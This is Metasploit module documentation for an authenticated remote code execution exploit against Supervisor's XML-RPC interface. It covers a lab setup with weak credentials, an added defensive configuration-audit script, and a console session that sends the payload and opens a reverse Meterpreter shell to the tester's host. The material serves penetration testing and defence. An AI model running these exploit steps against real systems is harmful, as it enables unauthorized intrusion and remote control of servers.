Vulnerable Application
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2.
It has been tested with versions 3.2.0 and 3.3.2.
Creating A Testing Environment
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
- `sudo apt-get install supervisor`
- Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
```
[inet_http_server] ; inet (TCP) server disabled by default
port=:9001 ; ip_address:port specifier, *:port for all iface
username=user ; default is no username (open server)
password=123 ; default is no password (open server)
```
- Restart the service:
sudo service supervisor restart
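
The `[inet_http_server]` settings above are what expose the XML-RPC endpoint in this test setup. The following Python script is an added example, not part of the module or of Supervisor: it audits a `supervisord.conf` for the same exposure (listener on all interfaces, missing or short basic-auth credentials, version in the range stated on this page). The function names, the 12-character password threshold and the treatment of an empty host as "all interfaces" are assumptions made for this example.

```python
import configparser
import re

# Constructed sample: the [inet_http_server] block from the test setup above.
SAMPLE_CONF = """\
[inet_http_server] ; inet (TCP) server disabled by default
port=:9001 ; ip_address:port specifier, *:port for all iface
username=user ; default is no username (open server)
password=123 ; default is no password (open server)
"""

AFFECTED = ((3, 0, 0), (3, 3, 2))  # range stated on this page: 3.0a1 to 3.3.2
MIN_PASSWORD_LEN = 12              # assumed local policy, not a Supervisor setting


def version_in_affected_range(version):
    """Compare the numeric release only; alpha/beta and distro suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    release = tuple(int(g or 0) for g in m.groups())
    return AFFECTED[0] <= release <= AFFECTED[1]


def audit_inet_http_server(conf_text, version):
    """Return a list of findings for the XML-RPC/web listener in supervisord.conf."""
    cp = configparser.ConfigParser(inline_comment_prefixes=(";",), interpolation=None)
    cp.read_string(conf_text)
    if not cp.has_section("inet_http_server"):
        return []  # TCP listener disabled, nothing to reach over the network
    sec = cp["inet_http_server"]
    findings = []
    host = sec.get("port", "").rpartition(":")[0]
    if host in ("", "*"):  # assumption: an empty host binds like "*"
        findings.append("listener bound to all interfaces")
    password = sec.get("password", "")
    if not sec.get("username") or not password:
        findings.append("no HTTP basic auth (open server)")
    elif not password.startswith("{SHA}") and len(password) < MIN_PASSWORD_LEN:
        findings.append("short HTTP basic auth password")  # {SHA} values are hashes, skipped
    if version_in_affected_range(version):
        findings.append(f"version {version} is in the affected range")
    return findings
```
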
Verification Steps
- `use exploit/linux/http/supervisor_xmlrpc_exec`
- `set lhost [IP]`
- `set rhost [IP]`
- `set httpusername user`
- `set httppassword 123`
- `exploit`
- A meterpreter session should have been opened successfully
Options
HttpUsername
Username for HTTP basic auth, as set in the conf file (optional)
HttpPassword
Password for HTTP basic auth, as set in the conf file (optional)
TARGETURI
The path to the XML-RPC endpoint
Scenarios
Supervisor 3.2.0 on Xubuntu 16.04
```
msf > use exploit/linux/http/supervisor_xmlrpc_exec
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check
[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
meterpreter >
```